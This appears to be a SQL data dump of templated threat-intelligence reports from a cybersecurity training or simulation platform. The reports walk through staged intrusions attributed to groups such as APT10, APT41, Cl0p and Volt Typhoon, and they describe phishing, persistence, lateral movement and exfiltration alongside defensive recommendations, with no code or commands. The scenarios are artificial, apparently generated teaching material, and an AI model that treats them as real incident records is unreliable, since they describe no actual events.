(104, 19, 391, 3, 'Establishing Persistence: Backdoor Implant Tactics', '### Overview\nAPT10\'s strategy for persistence involves deploying a stealthy backdoor implant that ensures ongoing access to the compromised systems.\n\n### Detailed Findings\n- **Backdoor Implant**: The implant is disguised as a legitimate system process, making detection challenging.\n- **Communication Channels**: The implant communicates with C2 servers using encrypted channels to evade detection.\n\n### Next Steps\nFocus will shift to identifying APT10\'s lateral movement techniques to access critical design servers within the aerospace network.', '2026-01-04 02:14:19'),
(105, 19, 392, 4, 'Lateral Movement: Accessing Design Servers', '### Overview\nAPT10 has successfully moved laterally within the network, reaching sensitive design servers crucial to aerospace projects.\n\n### Detailed Findings\n- **Credential Reuse**: Stolen credentials were used to authenticate with minimal detection.\n- **Network Mapping**: APT10 employed advanced network discovery tools to map the internal network architecture.\n\n### Next Steps\nAttention will now focus on how APT10 collects data from CAD repositories, preparing for exfiltration.', '2026-01-04 02:14:19'),
(106, 19, 393, 5, 'Data Collection from CAD Repositories', '### Overview\nAPT10 has begun the systematic collection of sensitive data from CAD repositories, focusing on proprietary designs and technologies.\n\n### Detailed Findings\n- **Data Targets**: High-value CAD files related to aerospace technologies were prioritized.\n- **Automated Scripts**: Custom scripts were used to streamline the data collection process.\n\n### Next Steps\nThe operation will now monitor the methods APT10 uses to exfiltrate the collected data, emphasizing the use of encrypted channels.', '2026-01-04 02:14:19'),
(107, 19, 394, 6, 'Exfiltration via Encrypted Channels', '### Overview\nAPT10 is in the process of exfiltrating the collected CAD data using encrypted channels to avoid detection by standard security measures.\n\n### Detailed Findings\n- **Encryption Protocols**: Utilized strong encryption to secure data in transit.\n- **Exfiltration Paths**: Data is being sent to overseas servers known to be associated with APT10.\n\n### Next Steps\nThe final phase will assess APT10\'s efforts to clean up and cover their tracks, focusing on defensive evasion techniques.', '2026-01-04 02:14:19'),
(108, 19, 395, 7, NULL, NULL, '2026-01-04 02:14:19'),
(109, 20, 396, 1, 'Execution of Malicious Script - Unlocked', '### Overview\nFollowing the detection of suspicious network activity, further investigation has revealed the execution of a potentially malicious script on multiple network endpoints. The script appears to connect to external command and control (C2) servers, indicating the possibility of an advanced persistent threat (APT) operation.\n\n### Key Findings\n- **Script Origin**: The script was deployed from an external IP address linked to known malicious activity.\n- **C2 Communication**: Established connections with C2 servers observed in previous Whitefly APT campaigns.\n- **Potential Impact**: If left unchecked, the script could allow attackers to execute further malicious activities within the network.\n\n### Recommendations\n- Conduct endpoint analysis to identify all systems affected by the script.\n- Isolate compromised systems to prevent further execution and communication with C2 servers.', '2026-01-04 02:15:53'),
(110, 20, 397, 2, 'Vcrodat Malware Persistence Mechanism - Unlocked', '### Overview\nThe investigation has progressed to identifying the persistence mechanisms employed by the Vcrodat malware identified in the healthcare network. Persistence is a key tactic used by the malware to maintain unauthorized access over an extended period.\n\n### Key Findings\n- **Registry Alterations**: Changes in the system registry to ensure malware execution upon startup.\n- **Scheduled Tasks**: Creation of hidden scheduled tasks to trigger the malware at specific intervals.\n- **System Services**: Manipulation of existing services to load malicious components.\n\n### Recommendations\n- Review and audit system registry and scheduled tasks for unauthorized entries.\n- Implement monitoring of system services to detect anomalies related to persistence mechanisms.', '2026-01-04 02:15:53'),
(111, 20, 398, 3, 'Compromised Open-Source Tool Identified - Unlocked', '### Overview\nDuring the analysis of persistence mechanisms, it was discovered that Whitefly APT has compromised an open-source tool widely used within the organization. This tool has been modified to evade defense mechanisms and facilitate lateral movement.\n\n### Key Findings\n- **Tool Modification**: Alterations to the source code to include backdoor functionality.\n- **Evasion Techniques**: The tool appears benign but contains hidden capabilities to bypass detection.\n- **Impact on Infrastructure**: The tool is deployed across several critical systems, amplifying the threat landscape.\n\n### Recommendations\n- Perform a comprehensive audit of open-source tools and validate their integrity.\n- Educate users on potential risks associated with unverified open-source software.', '2026-01-04 02:15:53'),
(112, 20, 399, 4, 'Unauthorized Credentials Accessed - Unlocked', '### Overview\nThe compromised open-source tool has facilitated unauthorized access to sensitive credentials, enabling lateral movement within the network. This breach exposes critical systems to further exploitation.\n\n### Key Findings\n- **Credential Dumping**: Use of the tool to extract login credentials from memory and secured storage.\n- **Privileged Access**: Attacker gained administrative privileges on several key systems.\n- **Lateral Movement**: Access used to pivot across the network to other high-value targets.\n\n### Recommendations\n- Implement multi-factor authentication to mitigate unauthorized access.\n- Regularly update and change credentials, especially for privileged accounts.', '2026-01-04 02:15:53'),
(113, 20, 400, 5, 'Unusual Data Access Patterns Detected - Unlocked', '### Overview\nA pattern of unusual data access has been identified, indicating potential data collection activities by the threat actor. The access patterns suggest targeted extraction of sensitive information.\n\n### Key Findings\n- **Data Queries**: High-frequency access to patient records and financial data.\n- **Anomalous Behavior**: Access occurring outside normal operating hours and from unexpected locations.\n- **Data Volume**: Significant increase in data retrieval activities, consistent with data staging for exfiltration.\n\n### Recommendations\n- Enhance data access monitoring and alerting capabilities.\n- Conduct data integrity checks to ensure no unauthorized modifications have occurred.', '2026-01-04 02:15:53'),
(114, 20, 401, 6, 'Data Exfiltration Attempt Blocked - Unlocked', '### Overview\nA data exfiltration attempt has been detected and successfully blocked. The perpetrators attempted to transfer sensitive data to external locations using encrypted channels.\n\n### Key Findings\n- **Exfiltration Vector**: Attempts made through secure HTTP channels to obfuscate activities.\n- **Blocked Channels**: Network defenses successfully identified and halted suspicious data transfers.\n- **Threat Actor Tactics**: Use of encryption and compression to mask data exfiltration attempts.\n\n### Recommendations\n- Strengthen perimeter defenses and encryption detection mechanisms.\n- Conduct a full review of attempted exfiltration activities to identify any potential gaps in security.', '2026-01-04 02:15:53'),
(115, 20, 402, 7, NULL, NULL, '2026-01-04 02:15:53'),
(116, 21, 403, 1, 'Analysis of Suspicious Email Attachment', '### Context and Analysis\n\nAfter detecting a suspicious email attachment, it was identified as a malicious document containing macros designed to execute a remote script. This script aims to install a malicious browser extension, providing attackers with a foothold for further operations.\n\n### Recommendations\n- **Immediate Action:** Block and quarantine the email and any similar ones identified in the network.\n- **User Awareness:** Conduct an awareness campaign focusing on recognizing phishing emails and suspicious attachments.\n\n### Next Steps\nMonitoring network traffic for unusual patterns that may indicate the installation of unauthorized browser extensions.', '2026-01-04 02:18:47'),
(117, 21, 404, 2, 'Malicious Browser Extension Installation', '### Context and Analysis\n\nPost-installation of the malicious browser extension, communication with known command and control (C2) servers was observed. The extension is designed to capture user credentials and session cookies, feeding them back to the attackers.\n\n### Recommendations\n- **Immediate Action:** Remove any unauthorized extensions from all systems, and conduct a security review of all browser extensions.\n- **Network Defense:** Implement network monitoring to detect unusual data flows to external servers.\n\n### Next Steps\nInvestigate potential execution of additional payloads, such as BabyShark VBS scripts, from the compromised host.', '2026-01-04 02:18:47'),
(118, 21, 405, 3, 'Execution of BabyShark VBS Script', '### Context and Analysis\n\nThe BabyShark VBS script has been executed, establishing persistence on the compromised systems. This script allows for continuous monitoring and data collection without detection, targeting sensitive information related to nuclear policy.\n\n### Recommendations\n- **Immediate Action:** Isolate affected systems to prevent further spread.\n- **System Hardening:** Review and enhance endpoint security measures to detect VBS script execution.\n\n### Next Steps\nConduct a thorough investigation into unauthorized network access attempts, focusing on lateral movement across the internal network.', '2026-01-04 02:18:47'),
(119, 21, 406, 4, 'Detection of Unauthorized Network Access', '### Context and Analysis\n\nEvidence of lateral movement within the network has been detected. The adversaries are leveraging compromised credentials to access sensitive areas of the network, specifically targeting documents and communications related to nuclear policy.\n\n### Recommendations\n- **Immediate Action:** Revoke compromised credentials and enforce a network-wide password reset.\n- **Network Segmentation:** Implement tighter access controls and segment sensitive data to limit unauthorized access.\n\n### Next Steps\nPrepare for potential data exfiltration attempts by enhancing monitoring of outgoing traffic and securing data transfer protocols.', '2026-01-04 02:18:47'),
(120, 21, 407, 5, NULL, NULL, '2026-01-04 02:18:47'),
(121, 22, 408, 1, 'Analysis of Supply Chain Compromise', '### Overview\nAPT41 has initiated the operation with a sophisticated supply chain attack. This initial access highlights their capability to infiltrate trusted third-party vendors, leveraging them as conduits into the primary target infrastructure. \n\n### Key Indicators\n- **Compromised Vendor**: Evidence suggests a vulnerability in the vendor\'s software update mechanism was exploited.\n- **Payload Delivery**: Malicious payload embedded within legitimate updates.\n\n### Next Steps\nPrepare for potential **Malware Deployment** as the adversary typically uses the established foothold to inject backdoor malware into the compromised systems.', '2026-01-04 02:21:52'),
(122, 22, 409, 2, 'Backdoor Malware Deployment Detected', '### Overview\nFollowing the supply chain compromise, APT41 has deployed backdoor malware to maintain clandestine access to the systems. This malware is likely custom-built and designed to evade detection.\n\n### Malware Characteristics\n- **Type**: Custom backdoor with advanced evasion features.\n- **Command and Control**: Utilizes encrypted communications to a remote server.\n\n### Next Steps\nThe focus will likely shift to **Establishing Persistence**. Anticipate techniques such as rootkit deployment to ensure long-term access and stealth.', '2026-01-04 02:21:52'),
(123, 22, 410, 3, 'Persistence Mechanism through Rootkit Deployment', '### Overview\nAPT41 has successfully established persistence by installing a rootkit. This rootkit operates at a low level, providing the attackers with the ability to maintain access and conceal their activities effectively.\n\n### Rootkit Details\n- **Capabilities**: Hides files, processes, and network connections.\n- **Installation**: Likely implanted through escalated privileges gained via malware.\n\n### Next Steps\nPrepare for **Lateral Movement** as the attackers might attempt to access sensitive databases, including those containing Personally Identifiable Information (PII).', '2026-01-04 02:21:52'),
(124, 22, 411, 4, 'Lateral Movement Towards PII Databases', '### Overview\nAPT41 has progressed to lateral movement, targeting databases containing PII. This phase involves exploiting compromised credentials and leveraging them to navigate through the network.\n\n### Techniques Observed\n- **Credential Dumping**: Use of tools to extract credentials from memory.\n- **Network Scanning**: Mapping out network architecture to identify PII storage.\n\n### Next Steps\nExpect imminent **Data Exfiltration** of gaming source code and PII. Implement network monitoring and data leakage prevention measures immediately.', '2026-01-04 02:21:52'),
(125, 22, 412, 5, NULL, NULL, '2026-01-04 02:21:52'),
(126, 23, 413, 1, 'In-Depth Analysis: Supply Chain Compromise', '### Overview\nThe recent detection of a **Supply Chain Compromise** indicates a sophisticated attempt to infiltrate our network through third-party software or services. This method is commonly employed by APT41 to bypass traditional security measures by embedding malicious code within trusted updates or applications.\n\n### Indicators of Compromise (IoCs)\n- Newly introduced DLL files in application directories.\n- Unusual outbound traffic patterns from software update services.\n\n### Recommended Actions\n- Conduct a comprehensive review of all third-party software sources.\n- Isolate compromised systems and initiate a forensic investigation.\n- Enhance monitoring on network traffic associated with supply chain services.\n\n### Next Steps\nPrepare for potential **Suspicious Script Execution**, as attackers might leverage compromised software to execute malicious scripts.', '2026-01-04 04:11:48'),
(127, 23, 414, 2, 'Investigation: Suspicious Script Execution Patterns', '### Overview\nFollowing the supply chain compromise, a **Suspicious Script Execution** has been detected. APT41 often utilizes scripts to automate the deployment of their payloads and establish a foothold in the network.\n\n### Key Findings\n- Scripts attempting to execute PowerShell commands with obfuscation techniques.\n- Log entries indicating unauthorized script activity during off-peak hours.\n\n### Recommendations\n- Implement script-blocking policies at the endpoint level.\n- Increase audit logging of PowerShell and other script execution frameworks.\n- Conduct user awareness training on recognizing phishing attempts that may lead to script execution.\n\n### Next Steps\nRemain vigilant for **Persistence Mechanism Activation**, as attackers may seek to maintain access to the compromised systems.', '2026-01-04 04:11:48'),
(128, 23, 415, 3, 'Insight: Persistence Mechanism Activation', '### Overview\nThe detection of a **Persistence Mechanism Activation** suggests that attackers are attempting to maintain long-term access to the compromised environment. APT41 may use various methods such as registry modifications or scheduled tasks.\n\n### Key Indicators\n- Creation of new registry keys pointing to unknown executables.\n- Scheduled tasks set to execute at irregular intervals.\n\n### Mitigation Strategies\n- Audit and clean registry entries associated with unauthorized applications.\n- Review and disable suspicious scheduled tasks.\n- Deploy Endpoint Detection and Response (EDR) tools to monitor persistence techniques.\n\n### Next Steps\nPrepare to intercept **Lateral Movement**, as attackers may attempt to expand their access across the network.', '2026-01-04 04:11:48'),
(129, 23, 416, 4, 'Analysis: Lateral Movement Detected', '### Overview\n**Lateral Movement** has been detected, indicating that the attackers are attempting to spread their foothold within the network. APT41 often uses stolen credentials and exploits to navigate through systems.\n\n### Evidence Collected\n- Unauthorized access attempts on multiple networked devices.\n- Usage of compromised credentials to access sensitive systems.\n\n### Defensive Measures\n- Implement network segmentation to limit lateral movement capabilities.\n- Conduct a full credential reset, prioritizing high-privilege accounts.\n- Utilize honeypots to detect unauthorized movement attempts.\n\n### Next Steps\nFocus on preventing **Data Exfiltration Attempts**, as attackers may attempt to extract valuable data before detection.', '2026-01-04 04:11:48'),
(130, 23, 417, 5, NULL, NULL, '2026-01-04 04:11:48'),
(131, 24, 418, 1, 'Insight into Initial Access through Phishing', '### Overview\nThe phishing email detected in the initial alert utilized a well-crafted spear-phishing technique targeting employees with access to critical systems.\n\n### Details\n- **Sender:** masqueraded as a trusted vendor.\n- **Subject Line:** \"Urgent Invoice Request\"\n- **Payload:** Attachment containing a malicious macro.\n\n### Recommendations\n- Conduct an organization-wide phishing awareness training.\n- Implement an email filtering system to detect and quarantine suspicious emails.\n\n### Next Steps\nMonitor for any execution of malware associated with this phishing attempt.', '2026-01-04 04:13:57'),
(132, 24, 419, 2, 'Analysis of Malware Execution', '### Overview\nFollowing the phishing incident, malware execution was detected on the targeted employee\'s workstation.\n\n### Details\n- **Type of Malware:** Cobalt Strike\n- **Execution Method:** Macro within Excel document\n- **Impact:** Established a command and control (C2) channel.\n\n### Recommendations\n- Isolate the affected workstation immediately.\n- Deploy endpoint detection and response (EDR) solutions to prevent further spread.\n\n### Next Steps\nInvestigate persistence mechanisms that may have been employed by the malware.', '2026-01-04 04:13:57'),
(133, 24, 420, 3, 'Detection of Persistence Mechanisms', '### Overview\nThe malware has established persistence to survive system reboots and maintain access.\n\n### Details\n- **Persistence Technique:** Registry run keys\n- **Additional Observations:** Scheduled tasks were also modified.\n\n### Recommendations\n- Review and clean registry entries.\n- Analyze scheduled tasks for unauthorized modifications.\n\n### Next Steps\nMonitor for unusual administrative access that may indicate lateral movement within the network.', '2026-01-04 04:13:57'),
(134, 24, 421, 4, 'Unauthorized Admin Access Detected', '### Overview\nAnomalous administrative access was detected, indicating potential lateral movement by the threat actor.\n\n### Details\n- **Account Compromised:** Admin account \"sysadmin\"\n- **Access Point:** Remote desktop protocol (RDP)\n- **Time of Access:** 03:45 AM\n\n### Recommendations\n- Immediately reset credentials for all admin accounts.\n- Implement multi-factor authentication (MFA) for critical accounts.\n\n### Next Steps\nInvestigate and monitor for any signs of data exfiltration attempts.', '2026-01-04 04:13:57'),
(135, 24, 422, 5, NULL, NULL, '2026-01-04 04:13:57'),
(136, 25, 423, 1, 'Phishing Email Analysis', '### Initial Findings\n\nThe phishing email detected contained a malicious attachment disguised as an invoice. The email was sent from a seemingly legitimate domain but upon further inspection, the domain was registered only days prior to the attack. The email header analysis revealed multiple red flags including mismatched sender information and a peculiar routing path through compromised servers.\n\n### Next Steps\n\n1. **Immediate Action:** Isolate the user account that received and interacted with the email.\n2. **Investigation:** Conduct a deeper analysis of the attachment to determine the specific exploit used.\n3. **Preparation:** Anticipate potential execution attempts via scripts and monitor PowerShell activity closely.', '2026-01-04 04:25:30'),
(137, 25, 424, 2, 'PowerShell Script Execution Insights', '### Script Analysis\n\nThe suspicious PowerShell script executed on the compromised endpoint was obfuscated to evade detection. The script attempted to download additional payloads from a remote server using encoded commands. This behavior is consistent with the initial stages of malware deployment.\n\n### Mitigation Steps\n\n1. **Isolation:** Disconnect the affected machine from the network immediately.\n2. **Forensic Analysis:** Capture a memory dump for further investigation.\n3. **Monitoring:** Enhance monitoring on PowerShell logs and network traffic to detect other possible execution attempts.\n\n### Preparing for Persistence\n\nBe vigilant for signs of persistence mechanisms, such as unusual changes in registry keys or scheduled tasks.', '2026-01-04 04:25:33'),
(138, 25, 425, 3, 'Persistence Mechanism Investigation', '### Observations\n\nPersistence was established through registry modifications and the creation of hidden scheduled tasks. Additionally, the malware created a startup entry to ensure execution upon system reboot.\n\n### Countermeasures\n\n1. **Registry Audit:** Conduct a full audit of recent registry changes, focusing on keys related to startup programs.\n2. **Scheduled Task Review:** Identify and remove unauthorized tasks.\n3. **User Education:** Reinforce training on recognizing and reporting phishing attempts.\n\n### Preparing for Lateral Movement\n\nMonitor RDP connections and unusual authentication attempts across the network.', '2026-01-04 04:25:33'),
(139, 25, 426, 4, 'Lateral Movement and Exfiltration Threat Analysis', '### Lateral Movement Detection\n\nThe adversary utilized Remote Desktop Protocol (RDP) to move laterally within the network. This was facilitated by previously compromised credentials.\n\n### Immediate Actions\n\n1. **Credential Review:** Reset passwords for all affected accounts and enforce MFA.\n2. **RDP Restrictions:** Limit RDP access to only essential personnel and monitor for unauthorized attempts.\n\n### Preparing for Data Exfiltration\n\nAs exfiltration is likely the next stage, enhance monitoring of outbound network traffic and inspect large data transfers for legitimacy. Employ DLP solutions to prevent unauthorized data transfers.', '2026-01-04 04:25:33'),
(140, 25, 427, 5, NULL, NULL, '2026-01-04 04:25:33'),
(141, 26, 428, 1, 'Analysis of Initial Access Vector', '### Overview\nAfter detecting the spear phishing email, our analysis has identified key elements within the email structure that are consistent with Cl0p\'s tactics. The email contained a seemingly legitimate attachment designed to deceive the recipient into executing it.\n\n### Email Characteristics\n- **Sender Address:** Spoofed domain closely resembling a known partner.\n- **Subject Line:** Urgent action required to avoid account suspension.\n- **Attachment:** A compressed file containing a malicious script.\n\n### Next Steps\nThe focus will now shift to monitoring potential execution vectors, particularly any script execution resulting from this phishing attempt.', '2026-01-04 04:38:04'),
(142, 26, 429, 2, 'Malicious Script Execution Confirmed', '### Overview\nA malicious script linked to the previously detected spear phishing email was executed on the target system. This script has been identified as a custom PowerShell script, a common tool in Cl0p\'s arsenal.\n\n### Script Analysis\n- **Payload:** The script downloads and executes additional payloads.\n- **Obfuscation Techniques:** Heavy use of string obfuscation to evade detection.\n- **Target System Impact:** Initial dropper for further malware deployment.\n\n### Next Steps\nOur priority is to determine how the attacker is establishing persistence. Monitoring registry changes and other system modifications will be critical.', '2026-01-04 04:38:04'),
(143, 26, 430, 3, 'Persistence Mechanism Detected', '### Overview\nPersistence has been established via registry modification, a tactic often utilized by Cl0p to maintain access to compromised systems.\n\n### Details of Modification\n- **Registry Key Altered:** HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n- **Malware Executable:** Set to launch a secondary payload on system startup.\n\n### Implications\nThis persistence method suggests a long-term intent to maintain control over the system.\n\n### Next Steps\nFocus will now be on detecting lateral movement attempts, particularly through credential dumping activities that may follow.', '2026-01-04 04:38:04'),
(144, 26, 431, 4, 'Credential Dumping Detected', '### Overview\nCredential dumping activity has been identified, indicating an attempt to escalate privileges and move laterally within the network.\n\n### Tools and Techniques\n- **Tool Utilized:** Mimikatz, a known tool for credential extraction.\n- **Target:** Local Security Authority Subsystem Service (LSASS) process.\n\n### Security Implications\nCompromised credentials could allow access to critical systems and sensitive data.\n\n### Next Steps\nImmediate attention is required to monitor for data exfiltration attempts, especially through encrypted channels, a known Cl0p tactic.', '2026-01-04 04:38:04'),
(145, 26, 432, 5, NULL, NULL, '2026-01-04 04:38:04'),
(146, 27, 433, 1, 'Analysis of Suspicious Login Attempts', '## Context:\nFollowing the detection of suspicious login attempts indicating potential password spraying, further analysis is required to determine the risk level and potential targets.\n\n### Summary:\n- **Targets Identified:** Diplomatic personnel accounts.\n- **IP Patterns:** Multiple IP addresses originating from known threat landscapes.\n- **Recommendations:**\n  - Implement multi-factor authentication (MFA).\n  - Increase monitoring on login attempts from suspicious IPs.\n  - Educate users on recognizing phishing attempts.\n\n### Next Steps:\nMonitoring should continue to detect any unusual token usage, potentially indicating token theft.', '2026-01-04 23:55:22'),
(147, 27, 434, 2, 'Unusual Token Usage Analysis', '## Context:\nFollowing the detection of unusual token usage patterns, this report delves deeper into potential token theft activities.\n\n### Summary:\n- **Token Characteristics:**\n  - Tokens used outside of normal geographic locations.\n  - Access requests for sensitive diplomatic documents.\n- **Attack Vector:** Possible exploitation of application vulnerabilities.\n- **Mitigation Measures:**\n  - Revoke compromised tokens.\n  - Reset affected accounts.\n  - Strengthen token issuance policies.\n\n### Next Steps:\nVigilance is required for any unauthorized OAuth applications that may be created, leveraging stolen tokens.', '2026-01-04 23:55:22'),
(148, 27, 435, 3, 'Unauthorized OAuth Application Creation Alert', '## Context:\nDetection of unauthorized OAuth applications suggests potential abuse aimed at gaining persistent access to sensitive resources.\n\n### Summary:\n- **Applications Identified:** Several OAuth applications mimicking legitimate services.\n- **Impacted Resources:** Access to email, cloud storage, and internal communication tools.\n- **Countermeasures:**\n  - Immediate removal of unauthorized applications.\n  - Conduct a thorough review of existing OAuth permissions.\n  - Tighten OAuth application approval processes.\n\n### Next Steps:\nMonitor for signs of lateral movement within the cloud environment to preempt further exploitation.', '2026-01-04 23:55:22'),
(149, 27, 436, 4, 'Lateral Movement and Cloud Exploitation Insights', '## Context:\nDetection of lateral movement within the cloud environment indicates potential exploitation following OAuth abuse.\n\n### Summary:\n- **Patterns Observed:**\n  - Access to multiple cloud services using compromised identities.\n  - Unusual escalation of privileges within cloud platforms.\n- **Threat Actors:** Likely linked to known APT groups targeting diplomatic entities.\n- **Defensive Actions:**\n  - Audit and restrict permissions on sensitive resources.\n  - Employ behavior analytics to detect anomalies.\n\n### Next Steps:\nRemain vigilant for any signs of data exfiltration, which may be the next phase of the attack.', '2026-01-04 23:55:22'),
(150, 27, 437, 5, NULL, NULL, '2026-01-04 23:55:22'),
(151, 28, 438, 1, 'Analysis of PowerShell Execution Patterns', '### Context\nFollowing the detection of unusual PowerShell execution, a detailed analysis was conducted to understand the patterns and motives behind this activity.\n\n### Findings\n- **Command Execution**: The PowerShell script was executed with obfuscated commands, suggesting an attempt to evade detection.\n- **Objective**: Initial analysis indicates the possibility of reconnaissance activities, potentially setting up for persistence mechanisms.\n\n### Recommendations\n- **Monitoring**: Enhance logging of PowerShell activities and implement real-time alerts for suspicious command patterns.\n- **Mitigation**: Implement PowerShell script block logging and transcription to capture detailed execution data.\n\n### Next Steps\nPrepare for potential persistence mechanisms, as suggested by the nature of the PowerShell activity. Stay vigilant for suspicious WMI activity.', '2026-01-04 23:57:10'),
(152, 28, 439, 2, 'Investigation into Suspicious WMI Activity', '### Context\nPost detection of suspicious WMI activity, an investigation was launched to determine the scope and impact of this persistence strategy.\n\n### Findings\n- **WMI Usage**: The attacker leveraged WMI to establish persistence, likely by creating event subscriptions to execute malicious scripts upon specific triggers.\n- **Scope**: This activity is consistent with tactics used by Volt Typhoon, indicating a sophisticated threat actor.\n\n### Recommendations\n- **Hardening**: Disable unnecessary WMI services and restrict access to only authorized personnel.\n- **Detection**: Employ advanced monitoring to detect new WMI event subscriptions or alterations to existing ones.\n\n### Next Steps\nPrepare for potential lateral movement, as WMI activity often precedes such actions. Monitor for changes in network configurations or unusual remote access attempts.', '2026-01-04 23:57:10'),
(153, 28, 440, 3, 'Security Implications of Anomalous netsh Configuration', '### Context\nAnomalous changes in netsh configuration were observed, indicating potential lateral movement efforts by the threat actor.\n\n### Findings\n- **Configuration Changes**: The attacker appears to have modified firewall rules and network configurations to facilitate lateral movement within the infrastructure.\n- **Intent**: Such changes are typically employed to bypass network security controls or to establish covert communication channels.\n\n### Recommendations\n- **Review**: Conduct a comprehensive review of all recent netsh configuration changes and validate against security policies.\n- **Prevention**: Implement strict access controls and regular audits on network configuration tools.\n\n### Next Steps\nMonitor for unusual remote desktop protocol (RDP) sessions, which may be utilized for further lateral movement across the network.', '2026-01-04 23:57:10'),
(154, 28, 441, 4, 'Detection of Unusual RDP Sessions', '### Context\nThe detection of unexpected RDP sessions suggests an ongoing lateral movement effort by the attacker within the network.\n\n### Findings\n- **RDP Activity**: Multiple unauthorized RDP sessions were initiated, likely to access sensitive systems and further compromise the infrastructure.\n- **Patterns**: The sessions were conducted using compromised credentials, indicating the threat actor\'s success in credential theft.\n\n### Recommendations\n- **Access Controls**: Enhance RDP access controls and enforce multi-factor authentication for remote access.\n- **Surveillance**: Implement continuous monitoring of RDP sessions and alert on any deviations from normal patterns.\n\n### Next Steps\nRemain alert for potential exfiltration attempts, as attackers may leverage newly gained access to exfiltrate data through encrypted channels.', '2026-01-04 23:57:10'),
(155, 28, 442, 5, NULL, NULL, '2026-01-04 23:57:10'),
(156, 29, 443, 1, 'Analysis of Phishing Email Tactics', '## Overview\nThe phishing email detected appears to be part of a coordinated campaign by Charming Kitten, targeting journalists. The email contains a malicious link disguised as a legitimate news article.\n\n## Detailed Analysis\n- **Sender Details**: The email masquerades as coming from a known media organization, using a spoofed domain closely resembling the legitimate one.\n- **Content**: The email body uses urgent language to entice the recipient to click on the link, promising exclusive content.\n\n## Recommendations\n- **User Awareness**: Encourage recipients to verify the sender\'s email address.\n- **Security Measures**: Implement email filtering and flagging for known malicious domains.\n\n## Next Steps\nPrepare for potential follow-up attacks through other communication channels such as WhatsApp.', '2026-01-04 23:59:37'),
(157, 29, 444, 2, 'Malicious WhatsApp Message Dissection', '## Overview\nFollowing the phishing email, a malicious WhatsApp message was detected, indicating a multi-channel social engineering approach by Charming Kitten.\n\n## Detailed Analysis\n- **Message Content**: The message contains a shortened URL leading to a website hosting the DownPaper backdoor.\n- **Social Engineering Aspect**: The message pretends to be a continuation of the email conversation, increasing credibility.\n\n## Recommendations\n- **User Training**: Advise targets to verify unexpected messages, particularly those with links.\n- **Technical Measures**: Enhance monitoring on communication apps for known malicious URLs.\n\n## Next Steps\nAnticipate potential malware execution if the DownPaper payload is delivered successfully.', '2026-01-04 23:59:37'),
(158, 29, 445, 3, 'DownPaper Backdoor Execution Analysis', '## Overview\nThe DownPaper backdoor has been executed on a system, confirming the delivery method was successful through the malicious WhatsApp message.\n\n## Detailed Analysis\n- **Payload Functionality**: The backdoor establishes a connection to a command and control server, allowing remote access.\n- **Indicators of Compromise**: Look for unusual network traffic and processes related to DownPaper.\n\n## Recommendations\n- **Immediate Action**: Isolate the affected system to prevent further compromise.\n- **Detection Enhancement**: Update endpoint protection to identify DownPaper signatures.\n\n## Next Steps\nMonitor for lateral movement attempts within the network.', '2026-01-04 23:59:37'),
(159, 29, 446, 4, 'Lateral Movement and Data Exfiltration Readiness', '## Overview\nAfter executing the DownPaper backdoor, attempts to move laterally across the network have been detected.\n\n## Detailed Analysis\n- **Movement Techniques**: The attackers are exploiting known vulnerabilities in network protocols to move between systems.\n- **Target Identification**: Critical systems and databases appear to be the focus of these movements.\n\n## Recommendations\n- **Network Segmentation**: Implement stricter segmentation to limit lateral movement.\n- **Patch Management**: Ensure all systems are up-to-date with the latest security patches.\n\n## Next Steps\nPrepare for possible data exfiltration attempts by monitoring outgoing traffic for anomalies.', '2026-01-04 23:59:37'),
(160, 29, 447, 5, NULL, NULL, '2026-01-04 23:59:37'),
(161, 30, 448, 1, 'Initial Access Analysis: VPN Anomaly', '### VPN Login Anomaly\n\nAfter the detection of a suspicious VPN login from an unusual location, further investigation revealed that the credentials used were valid, suggesting potential credential compromise. The login originated from an IP address associated with known malicious activity. Analysts are advised to monitor for any further signs of unauthorized access.\n\n#### Recommendations\n- Immediately reset compromised credentials.\n- Implement geo-restriction policies on VPN access.\n- Increase logging and monitoring on VPN devices.', '2026-01-05 00:02:38');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(162, 30, 449, 2, 'Execution Tactics: Web Shell Deployment', '### Web Shell Detected on VPN Device\n\nA web shell has been detected on the compromised VPN device, indicating execution of potentially malicious code. The web shell allows remote execution of commands and could be used to further infiltrate the network.\n\n#### Recommendations\n- Isolate impacted VPN devices immediately.\n- Conduct a thorough inspection for additional web shells.\n- Patch any vulnerabilities in the VPN firmware.', '2026-01-05 00:02:38'),
(163, 30, 450, 3, 'Lateral Movement Insights: Network Traffic Anomalies', '### Unusual Network Traffic Patterns\n\nPost web shell deployment, there has been unusual network traffic from the VPN device to multiple internal servers. This traffic suggests lateral movement attempts within the network, potentially targeting critical systems or domain controllers.\n\n#### Recommendations\n- Capture and analyze network traffic logs.\n- Deploy network segmentation to limit lateral movement.\n- Increase IDS/IPS sensitivity to detect anomalous traffic.', '2026-01-05 00:02:38'),
(164, 30, 451, 4, 'Persistence Analysis: Domain Controller Access Attempt', '### Unauthorized Domain Controller Access\n\nAn unauthorized access attempt was detected on the domain controller, suggesting efforts to establish persistence. The attacker likely seeks to maintain long-term access to the network.\n\n#### Recommendations\n- Audit domain controller access logs for anomalies.\n- Implement two-factor authentication for sensitive systems.\n- Regularly review and harden domain controller configurations.', '2026-01-05 00:02:38'),
(165, 30, 452, 5, 'Credential Harvesting: Mimikatz Activity', '### Mimikatz Detected on Domain Controller\n\nMimikatz, a tool used for credential harvesting, was detected running on the domain controller. This indicates that the attacker is attempting to extract credentials to escalate privileges and expand access.\n\n#### Recommendations\n- Revoke and reset compromised credentials immediately.\n- Implement endpoint detection and response solutions.\n- Conduct a full security audit of domain controller systems.', '2026-01-05 00:02:38'),
(166, 30, 453, 6, 'Exfiltration Alert: Data Movement from Domain Controller', '### Data Exfiltration Detected\n\nSignificant data exfiltration activity has been detected from the domain controller. This suggests that sensitive information has been compromised and potentially transferred outside the network.\n\n#### Recommendations\n- Identify and secure the data exfiltration point.\n- Implement data loss prevention tools.\n- Notify relevant stakeholders and legal entities as per compliance requirements.', '2026-01-05 00:02:38'),
(167, 30, 454, 7, NULL, NULL, '2026-01-05 00:02:38'),
